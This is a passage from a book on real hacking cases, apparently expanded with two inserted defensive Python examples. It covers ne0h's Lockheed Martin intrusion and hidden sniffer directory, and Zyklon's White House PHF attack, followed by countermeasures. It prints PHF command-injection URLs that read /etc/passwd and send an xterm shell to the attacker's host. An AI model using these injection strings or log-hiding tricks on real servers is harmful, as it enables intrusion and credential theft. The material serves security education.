Authors: Kevin D. Mitnick,William L. Simon
Tags: #Computer Hackers, #Computer Security, #Computers, #General, #Security
Comrade's old buddy ne0h works for a major telecom company (a nine-to-five job is "no good," he says), but he'll shortly be in Los Angeles for three months on a manual labor job he took because the pay is so much more than he's making right now. Joining mainstream society, he hopes to put away enough for a down payment on a house in the community where he currently lives.
When the three-month high-paying drudgery is over, ne0h, too, talks about starting college -- but not to study computer science. "Most of the people I've ever run into that have computer science degrees know shit-all," he says. Instead, he'd like to major in business and organizational management, then get into the computer field on a business level.
Talking about his old exploits brings up his Kevin fixation again. To what extent did he imagine himself walking in my shoes?
Did I want to get caught? I did and I didn't. Being caught shows "I can do it, I did it." It's not like I wanted to get caught on purpose. I wanted to get caught so I would fight it, I would be released, I would be the hacker that got away. I would get out, get a good sound job with a government agency and I would fit right in with the underground.
How Great Is the Threat?

The combination of determined terrorists and fearless kid hackers could be disastrous for this country. This episode left me wondering how many other Khalids are out there recruiting kids (or even unpatriotic adults with hacking skills) who hunger after money, personal recognition, or the satisfaction of successfully achieving difficult tasks. The post-Khalid recruiters may be more secretive and not as easy to identify.
When I was in pretrial detention facing hacking-related charges, I was approached several times by a Colombian drug lord. He was facing life in federal prison without the possibility of parole. He offered me a sweet deal: I would be paid $5 million in cash for hacking into "Sentry" -- the Federal Bureau of Prisons computer system -- and releasing him from custody. This guy was the real thing and deadly serious. I didn't accept his offer, but I gave the impression I would help him out to avoid any confrontation. I wonder what ne0h would have done in a similar situation.
Our enemies may well be training their soldiers in the art of cyber warfare to attack our infrastructure and defend their own. It seems like a no-brainer that these groups would also recruit knowledgeable hackers from anywhere in the world for training and for mission-critical projects.
In 1997 and again in 2003, the Department of Defense launched Operation Eligible Receiver -- an effort to test the vulnerability of this nation to electronic attack. According to an account published in the Washington Times[10] about the earlier of these efforts, "Senior Pentagon leaders were stunned by a military exercise showing how easy it is for hackers to cripple U.S. military and civilian computer networks." The article goes on to explain that the National Security Agency assembled a group of its computer specialists as a "red team" of hackers, allowed to use only off-the-shelf computer equipment available to the public, along with any hacking tools, including exploit code, they could download from the Internet or electronic bulletin boards.
In a few days the red team hackers infiltrated the computer systems controlling parts of the nation's electric power grid and with a series of commands could have turned sections of the country dark. "If the exercise had been real," the Christian Science Monitor reported, "they could have disrupted the Department of Defense's communication systems (taking out most of the Pacific Command) and gained access to computer systems aboard U.S. Navy vessels."[11]
In my own personal experience, I was able to defeat security mechanisms used by a number of Baby Bells to control access to telephone switches. A decade ago, I had complete control over most switches managed by Pacific Bell, Sprint, GTE, and others. Imagine the chaos that a resourceful terrorist group could have wreaked with the same level of access.
Members of Al Qaeda and other terrorist groups have a record of using computer networks in planning terrorist acts. Evidence suggests that terrorists made some use of the Internet in planning their operations for the 9/11 attacks.
If Khalid Ibrahim was successful in getting information through any of the young hackers, no one is acknowledging it. If he was really connected with the attacks on the World Trade Center and the Pentagon, definitive proof is missing. Yet no one knows when he or one of his kind will reappear on the cyberspace scene, trolling for naive helpers who get a thrill out of "doing shit you're not supposed to be doing, going places you're not supposed to go." Kids who might think that the challenge they're being offered is "cool."
For young hackers, weak security remains a continuing invitation. Yet the hackers in this story should have recognized the danger in a foreign national recruiting them to compromise sensitive U.S. computer networks. I have to wonder how many other ne0hs have been recruited by our enemies.
Good security was never more important than in a world populated by terrorists.
INSIGHT

ne0h provided us with details on how he hacked into the Lockheed Martin computer systems. The story is a testimony both to the innovation of hackers ("If there's a flaw in the security, we'll find it" might be the hacker motto) and a cautionary tale for every organization.
He quickly determined that Lockheed Martin was running its own Domain Name Servers. DNS, of course, is the Internet protocol that, for example, translates ("resolves") www.disney.com into 198.187.189.55, an address that can be used to route message packets. ne0h knew that a security research group in Poland had published what hackers call an exploit -- a program specifically designed to attack one particular vulnerability -- to take advantage of a weakness in the version of the DNS that Lockheed was running.
The company was using an implementation of the DNS protocols called BIND (Berkeley Internet Name Domain). The Polish group had found that one version of BIND was susceptible to a type of attack involving a remote buffer overflow, and that version was the one being used at Lockheed Martin. Following the method he had discovered online, ne0h was able to gain root (administrative) privileges on both the primary and secondary Lockheed DNS servers.
After gaining root, ne0h set out to intercept passwords and e-mail by installing a sniffer program, which acts like a computer wiretap. Any traffic being sent over the wire is covertly captured; the hacker usually sends the data to be stored in a place where it will be unlikely to be noticed. To hide the sniffer log, ne0h says, he created a directory with a name that was simply a space, represented by three dots; the actual path he used was "/var/adm/ ..." Upon a brief inspection, a system administrator might overlook this innocuous item.
This technique of hiding the sniffer program, while effective in many situations, is quite simple; much more sophisticated methods exist for covering a hacker's tracks in a situation like this.
Before ever finding out if he would be able to penetrate further into the Lockheed Martin network to obtain company confidential information, ne0h was diverted to another task. Lockheed Martin's sensitive files remained safe.
For the White House hack, Zyklon says he initially ran a program called a CGI (common gateway interface) scanner, which scans the target system for CGI vulnerabilities. He discovered the Web site was susceptible to attack using the PHF exploit, which takes advantage of a programmer error made by the developer of the PHF (phone book) script.
PHF is a form-based interface that accepts a name as input and looks up the name and address information on the server. The script called a function escape_shell_cmd(), which was supposed to sanitize the input for any special characters. But the programmer had left one character off his list, the newline character. A knowledgeable attacker could take advantage of this oversight by providing input into the form that included the encoded version (0x0a) of the newline character. Sending a string with this character tricks the script into executing any command that the attacker chooses.
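The flaw described above is a denylist sanitizer that escapes a fixed set of shell metacharacters but omits the one that matters. The following is an added example (not the original PHF source, and not code from the book): the metacharacter list in escape_shell_cmd_legacy() is a simplified reconstruction that reproduces only the property the text describes, namely that a newline passes through. Beside it is the hardened form a defender would want: decode the parameter, accept it only if it matches a strict allowlist, and answer the lookup from an in-process table so that no shell is ever involved. The directory contents and the alias names are constructed for the example.

```python
"""Denylist escaping versus allowlist validation for a PHF-style CGI lookup."""
import re
from urllib.parse import unquote

# Simplified reconstruction of a legacy denylist (assumption for this example):
# a fixed set of shell metacharacters that get a backslash. The newline is
# deliberately absent, mirroring the oversight described in the text.
LEGACY_ESCAPED = set('&;`\'"|*?~<>^()[]{}$\\')


def escape_shell_cmd_legacy(value: str) -> str:
    """Backslash-escape known metacharacters the way a denylist sanitizer would.

    Because '\\n' is not on the list, a decoded %0a survives intact, and a shell
    reading the result would treat it as a command boundary.
    """
    return ''.join('\\' + c if c in LEGACY_ESCAPED else c for c in value)


def still_has_command_boundary(value: str) -> bool:
    """Detection check: True if a raw newline or carriage return survived escaping."""
    return '\n' in value or '\r' in value


# Hardened path: allowlist of characters a phone-book alias may contain.
ALIAS_RE = re.compile(r'[A-Za-z0-9._-]{1,64}')


def validate_alias(value: str):
    """Return the alias if it is a plain name token, otherwise None.

    fullmatch() requires the whole string to match, so any embedded control
    character (including a decoded %0a) causes rejection rather than escaping.
    """
    return value if ALIAS_RE.fullmatch(value) else None


def lookup_phonebook(raw_query: str, directory: dict):
    """Hardened lookup: URL-decode, validate against the allowlist, then consult
    an in-memory table. No external program and no shell are involved, so there
    is nothing for a stray metacharacter to influence."""
    alias = validate_alias(unquote(raw_query))
    if alias is None:
        return None
    return directory.get(alias)


# Constructed sample directory for the example.
SAMPLE_DIRECTORY = {
    'alice': 'Alice Example, Room 101, ext. 1234',
    'bob': 'Bob Example, Room 202, ext. 5678',
}
```

The contrast to take away is that the legacy routine answers "which characters do I know are dangerous?", while the hardened routine answers "which characters are allowed?"; only the second question has a complete answer.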
Zyklon typed into his browser the URL:
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
With this, he was able to display the password file for whitehouse.gov. But he wanted to gain full control over the White House Web server. He knew it was highly likely that the X server ports would be blocked by the firewall, which would prevent him from connecting to any of those services on whitehouse.gov. So instead, he again exploited the PHF hole by entering
http://www.whitehouse.gov/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20zyklons.ip.address:0.0
This caused an xterm to be sent from the White House server to a computer under his control running an X server. That is, instead of connecting to whitehouse.gov, in effect he was commanding the White House system to connect to him. (This is only possible when the firewall allows outgoing connections, which was apparently the case here.)
He then exploited a buffer overflow vulnerability in the system program ufsrestore. And that, Zyklon says, enabled him to gain root on whitehouse.gov, as well as access to the White House mail server and other systems on the network.
COUNTERMEASURES

The exploits of ne0h and Comrade described here raise two issues for all companies.
The first is simple and familiar: Keep current on all the latest operating system and application releases from your vendors. It's essential to exercise vigilance in keeping up with and installing any security-related patches or fixes. To make sure this isn't done on a hit-or-miss basis, all companies should develop and implement a patch management program, with the goal of alerting the appropriate personnel whenever a new patch is issued on products the company uses -- operating system software in particular, but also application software and firmware.
And when a new patch becomes available, it must be installed as soon as possible -- immediately, unless this would disrupt corporate operations; otherwise, at the earliest practical time. It's not hard to understand overworked employees who yield to the pressure of focusing on those highly visible projects (installing systems for new workers, to give just one example) and getting around to installing patches on a time-available basis. But if the unpatched device is publicly accessible from the Internet, that creates a very risky situation.
Numerous systems are compromised because of the lack of patch management. Once a vulnerability is publicly disclosed, the window of exposure is significantly increased until the vendor has released a patch that fixes the problem, and customers have installed it.
Your organization needs to make the installing of patches a high-priority item, with a formal patch management process that reduces the window of exposure as quickly as possible subject to the demands of not interfering with critical business operations.
But even being vigilant about installing patches isn't enough. ne0h says that some of the break-ins in which he participated were accomplished through the use of "zero-day" exploits -- a break-in based on a vulnerability that is not known to others outside a very small group of hacker buddies. "Zero day" is the day they first exploit the vulnerability, and hence the day the vendor and the security community first become aware of it.
Because there is always a potential to be compromised by a zero-day exploit, every organization using the flawed product is vulnerable until a patch or workaround is released. So how do you mitigate the risk of this exposure?
I believe the only viable solution lies in using a defense in depth model. We must assume that our publicly accessible computer systems will be vulnerable to a zero-day attack at some point in time. Thus, we should create an environment that minimizes the potential damage a bad guy can do. One example, as mentioned earlier, is to place publicly accessible systems on the DMZ of the company firewall. The term DMZ, borrowed from the military/political abbreviation for demilitarized zone, refers to setting up network architecture so that systems the public has access to (Web servers, mail servers, DNS servers, and the like) are isolated from sensitive systems on the corporate network. Deploying a network architecture that protects the internal network is one example of defense in depth. With this arrangement, even if hackers discover a previously unknown vulnerability and a Web server or mail server is compromised, the corporate systems on the internal network are still protected by another layer of security.
Companies can mount another effective countermeasure by monitoring the network or individual hosts for activity that appears unusual or suspicious. An attacker usually performs certain actions once he or she has successfully compromised a system, such as attempting to obtain encrypted or plaintext passwords, installing a back door, modifying configuration files to weaken security, or modifying system, application, or log files, among other efforts. Having a process in place that monitors for these types of typical hacker behavior and alerts the appropriate staff to these events can help with damage control.
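Two of the post-compromise actions just listed (weakening configuration files and planting new files) and the "/var/adm/ ..." hiding trick from the Lockheed Martin account earlier are exactly what a host-monitoring process can catch. The block below is an added example, not code from the book or from any product it names: it takes a SHA-256 baseline of a directory tree, reports files modified, added or removed since the baseline, and separately flags directory names an administrator's eye tends to skip (runs of dots beyond "." and "..", names that are only whitespace, leading or trailing spaces, control characters). The demo() function builds a small constructed file tree in a temporary directory and simulates the changes, so it runs offline; the file names and contents in it are invented for the example.

```python
"""Host monitoring: file-integrity baseline/diff plus suspicious-directory scan."""
import hashlib
import os
import tempfile
from pathlib import Path


def is_suspicious_dirname(name: str) -> bool:
    """Flag names chosen to blend into a listing: '...', ' ', ' ...', or control chars."""
    if name in ('.', '..'):
        return False
    stripped = name.strip()
    if stripped == '' or set(stripped) == {'.'}:
        return True                      # whitespace-only or dots-only
    if name != stripped:
        return True                      # leading or trailing whitespace
    return any(ord(c) < 32 for c in name)  # embedded control characters


def find_suspicious_dirs(root: str) -> list:
    """Walk root and return paths (relative, POSIX style) of suspicious directories."""
    hits = []
    for dirpath, dirnames, _ in os.walk(root):
        for d in dirnames:
            if is_suspicious_dirname(d):
                hits.append((Path(dirpath) / d).relative_to(root).as_posix())
    return sorted(hits)


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, 'rb') as f:
        for chunk in iter(lambda: f.read(65536), b''):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root: str) -> dict:
    """Map relative path -> SHA-256 digest for every regular file under root."""
    baseline = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            p = Path(dirpath) / name
            if p.is_file():
                baseline[p.relative_to(root).as_posix()] = sha256_file(p)
    return baseline


def diff_baseline(old: dict, new: dict) -> dict:
    """Classify every path as modified, added, or removed relative to the baseline."""
    return {
        'modified': sorted(k for k in old if k in new and old[k] != new[k]),
        'added': sorted(k for k in new if k not in old),
        'removed': sorted(k for k in old if k not in new),
    }


def demo() -> dict:
    """Constructed scenario: baseline a fake /etc and /var/adm, then simulate
    the kinds of changes the text describes and report what monitoring sees."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / 'etc').mkdir()
        (root / 'var' / 'adm').mkdir(parents=True)
        (root / 'etc' / 'passwd').write_text('root:x:0:0:root:/root:/bin/sh\n')
        (root / 'etc' / 'sshd_config').write_text('PermitRootLogin no\n')
        baseline = build_baseline(tmp)

        # Simulated post-compromise activity (constructed for the example).
        (root / 'etc' / 'sshd_config').write_text('PermitRootLogin yes\n')   # weakened config
        (root / 'etc' / 'rc.local').write_text('# placeholder startup entry\n')  # new file
        hidden = root / 'var' / 'adm' / ' ...'                                # space + three dots
        hidden.mkdir()
        (hidden / 'sniff.log').write_text('placeholder capture\n')

        report = diff_baseline(baseline, build_baseline(tmp))
        report['suspicious_dirs'] = find_suspicious_dirs(tmp)
        return report


if __name__ == '__main__':
    for key, paths in demo().items():
        print(f'{key}: {paths}')
```

In production the baseline would be stored off-host (a read-only copy or a remote collector) and the comparison scheduled, since an intruder with root can rewrite a baseline that lives on the same machine; that is the "another layer" idea from the defense-in-depth discussion applied to monitoring itself.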
On a separate topic, I've been interviewed countless times by the press about the best ways to protect your business and your personal computer resources in today's hostile environment. One of my basic recommendations is to use a stronger form of authentication than static passwords. You will never know, except perhaps after the fact, when someone else has found out your password.
A number of second-level sign-on techniques are available to be used in combination with a traditional password, to provide much greater security. In addition to RSA's SecurID, mentioned earlier, SafeWord PremierAccess offers passcode-generating tokens, digital certificates, smart cards, biometrics, and other techniques.